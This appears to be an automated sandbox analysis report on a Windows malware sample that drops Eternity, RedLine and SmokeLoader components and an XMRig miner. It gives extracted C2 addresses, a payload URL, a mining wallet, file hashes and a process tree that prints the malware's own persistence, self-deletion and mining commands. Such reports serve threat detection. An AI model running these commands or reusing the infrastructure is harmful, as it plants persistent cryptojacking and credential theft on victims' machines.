Analysis

  • max time kernel
    152s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    04/09/2022, 08:20

General

  • Target

    ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe

  • Size

    290KB

  • MD5

    2d1f283056afba3e59b97ba5d2e3c36c

  • SHA1

    18fbb5c92a65a542efc33c4e000befc7f4b72116

  • SHA256

    ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923

  • SHA512

    95413dbadc9fbaf53c54c8583fbd6d1e1bd4102ba3f4288603e055711859c8ac61ca9519fe2c16005ecfa7d985c8342ba37931f1cd8a8f2313ddec91f76b129b

  • SSDEEP

    3072:m71zXZ1wMA4fCbMROmbiF7SN4Q+LcjGraJSjonbl5O:BMKbMROmbitmmcjxHD

Malware Config

Extracted

Family

eternity

C2

http://rlcjba7wduej3xcstcjo577eqgjsjvcjfsw4i23fqvf2y27ylylhmhad.onion

Wallets

45coZygmFLnRF5NY7Uz51tadci9wak52fbbhfgKR5q5BTB9QbKMiCnXiPiiwCwyUTQeF4nZD5mdAugj8yB5hTLA9ViAFFR8

Attributes
  • payload_urls

    http://rlcjba7wduej3xcstcjo577eqgjsjvcjfsw4i23fqvf2y27ylylhmhad.onion.pet/shared/xmrig.exe

Extracted

Family

redline

Botnet

installs-49

C2

94.140.112.157:29329

Attributes
  • auth_value

    f137ab12b29192785aff1f9a524f0090

Signatures

  • Detects Smokeloader packer 2 IoCs
  • Eternity

    Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • xmrig

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials and similar sensitive data.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe
    "C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:4988
  • C:\Users\Admin\AppData\Local\Temp\1FA8.exe
    C:\Users\Admin\AppData\Local\Temp\1FA8.exe
    1⤵
    • Executes dropped EXE
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1748
    • C:\Users\Admin\AppData\Local\Temp\Miner.exe
      "C:\Users\Admin\AppData\Local\Temp\Miner.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3668
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Miner" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Miner.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1144
        • C:\Windows\SysWOW64\chcp.com
          chcp 65001
          4⤵
          PID:980
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1
            4⤵
            • Runs ping.exe
            PID:1616
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn "Miner" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe" /rl HIGHEST /f
            4⤵
            • Creates scheduled task(s)
            PID:428
          • C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe
            "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe"
            4⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4496
            • C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe
              "C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe" -a cryptonight -o pool.supportxmr.com:3333 -u 45coZygmFLnRF5NY7Uz51tadci9wak52fbbhfgKR5q5BTB9QbKMiCnXiPiiwCwyUTQeF4nZD5mdAugj8yB5hTLA9ViAFFR8.Admin_XZIOFAVD -p --max-cpu-usage=40 --donate-level=1
              5⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:3848
      • C:\Users\Admin\AppData\Local\Temp\installs49.exe
        "C:\Users\Admin\AppData\Local\Temp\installs49.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1780
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 1424
        2⤵
        • Program crash
        PID:5060
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1748 -ip 1748
    1⤵
    PID:1712
  • C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe
    C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe
    1⤵
    • Executes dropped EXE
    PID:4904

Network

MITRE ATT&CK Enterprise v6

Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Miner.exe.log

              Filesize

              612B

              MD5

              81ab0e59097e03cb04c32378024d6628

              SHA1

              cc2a7a335f905e787906b6a0820acfbd4c5d0ed2

              SHA256

              704dd8b8fb6dfccf43fd0712e36950102151fe7232d6602c53a42af967969533

              SHA512

              3dd1374962c4d913ad6ec4207889abcca3e28946fa8937626bd2d13025a538e676bfc2efe76d27031d3f741bb3934104c0cf4e10da62758839add1fe543dfacb

            • C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

              Filesize

              16KB

              MD5

              d1b22ce6e0f11c1b8283a85d9f902bbd

              SHA1

              8593038e651f856367d094b4541dd7cbffb8e7a3

              SHA256

              95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8

              SHA512

              d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed

            • C:\Users\Admin\AppData\Local\Temp\1FA8.exe

              Filesize

              436KB

              MD5

              f1ae38e744808d4df42eed53c896323a

              SHA1

              0d0edac38a4e1a1c073aa99fc1009230a05deb74

              SHA256

              9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439

              SHA512

              b23262fd0709c2cdf2702bab85a39ffeeebc28644e268ddecf5861bef6307b3f92c50a73b5725fa1a8578033c446bd957277224a24ed7ccd806bf3d0a77376d6

            • C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe

              Filesize

              4.7MB

              MD5

              84cbc72865b542c646bd89bb9430e7d1

              SHA1

              c8320b1e24f22b36c1a283506dacdcbcf5598a4f

              SHA256

              323a18d661fab8c743bb0584b4182902f49640a9ead4b9cedfb548889c25a9d4

              SHA512

              235afdba7fcf029920a20ac3d99ce0dacd87554d27a0e473ff5636c74f7f747ed9d242637d10963bac7461f789266191b37beaec0b9acdd2dc38b0f196ae65a8

            • C:\Users\Admin\AppData\Local\Temp\Miner.exe

              Filesize

              16KB

              MD5

              d1b22ce6e0f11c1b8283a85d9f902bbd

              SHA1

              8593038e651f856367d094b4541dd7cbffb8e7a3

              SHA256

              95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8

              SHA512

              d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed

            • C:\Users\Admin\AppData\Local\Temp\installs49.exe

              Filesize

              88KB

              MD5

              24f5400ea175ed8a981c5f4184587ac4

              SHA1

              24b9e12675b4e5f389eb01d6c423e123909d02d9

              SHA256

              3be6f25cd0a2f0c367e34e6b2d300671626dcb7ce46aeb83f3396433d8da9bc4

              SHA512

              4d685f9f062359b6aae187cb88c98d55c059a316bccf6fc07aed3cbb172ee55edf84aa2fd53f67d9a5301195dddf7dc68e7e10ea2ffdf7d8a13750440f0a9669

            • memory/1748-141-0x0000000007320000-0x00000000078C4000-memory.dmp

              Filesize

              5.6MB

            • memory/1748-144-0x0000000000400000-0x0000000002BB6000-memory.dmp

              Filesize

              39.7MB

            • memory/1748-162-0x0000000000400000-0x0000000002BB6000-memory.dmp

              Filesize

              39.7MB

            • memory/1748-142-0x0000000002E4C000-0x0000000002E81000-memory.dmp

              Filesize

              212KB

            • memory/1748-161-0x0000000002E4C000-0x0000000002E81000-memory.dmp

              Filesize

              212KB

            • memory/1748-143-0x00000000047D0000-0x0000000004812000-memory.dmp

              Filesize

              264KB

            • memory/1780-158-0x00000000050D0000-0x00000000050E2000-memory.dmp

              Filesize

              72KB

            • memory/1780-170-0x0000000006100000-0x000000000611E000-memory.dmp

              Filesize

              120KB

            • memory/1780-157-0x00000000061A0000-0x00000000067B8000-memory.dmp

              Filesize

              6.1MB

            • memory/1780-173-0x0000000006BE0000-0x0000000006C30000-memory.dmp

              Filesize

              320KB

            • memory/1780-159-0x0000000005200000-0x000000000530A000-memory.dmp

              Filesize

              1.0MB

            • memory/1780-160-0x0000000005130000-0x000000000516C000-memory.dmp

              Filesize

              240KB

            • memory/1780-172-0x0000000007110000-0x000000000763C000-memory.dmp

              Filesize

              5.2MB

            • memory/1780-163-0x0000000005B80000-0x0000000005C12000-memory.dmp

              Filesize

              584KB

            • memory/1780-171-0x0000000006A10000-0x0000000006BD2000-memory.dmp

              Filesize

              1.8MB

            • memory/1780-156-0x0000000000830000-0x000000000084C000-memory.dmp

              Filesize

              112KB

            • memory/1780-169-0x0000000006120000-0x0000000006196000-memory.dmp

              Filesize

              472KB

            • memory/3668-148-0x0000000000230000-0x000000000023A000-memory.dmp

              Filesize

              40KB

            • memory/3668-149-0x0000000004A60000-0x0000000004AC6000-memory.dmp

              Filesize

              408KB

            • memory/3848-179-0x0000027035200000-0x0000027035220000-memory.dmp

              Filesize

              128KB

            • memory/3848-181-0x0000027035200000-0x0000027035220000-memory.dmp

              Filesize

              128KB

            • memory/3848-182-0x0000027035220000-0x0000027035240000-memory.dmp

              Filesize

              128KB

            • memory/3848-180-0x0000027035220000-0x0000027035240000-memory.dmp

              Filesize

              128KB

            • memory/3848-178-0x0000027033910000-0x0000027033930000-memory.dmp

              Filesize

              128KB

            • memory/3848-177-0x00000270338D0000-0x00000270338F0000-memory.dmp

              Filesize

              128KB

            • memory/4988-134-0x0000000000400000-0x0000000002B92000-memory.dmp

              Filesize

              39.6MB

            • memory/4988-137-0x0000000000400000-0x0000000002B92000-memory.dmp

              Filesize

              39.6MB

            • memory/4988-135-0x0000000002F1D000-0x0000000002F2D000-memory.dmp

              Filesize

              64KB

            • memory/4988-133-0x0000000002E30000-0x0000000002E39000-memory.dmp

              Filesize

              36KB

            • memory/4988-136-0x0000000002E30000-0x0000000002E39000-memory.dmp

              Filesize

              36KB

            • memory/4988-132-0x0000000002F1D000-0x0000000002F2D000-memory.dmp

              Filesize

              64KB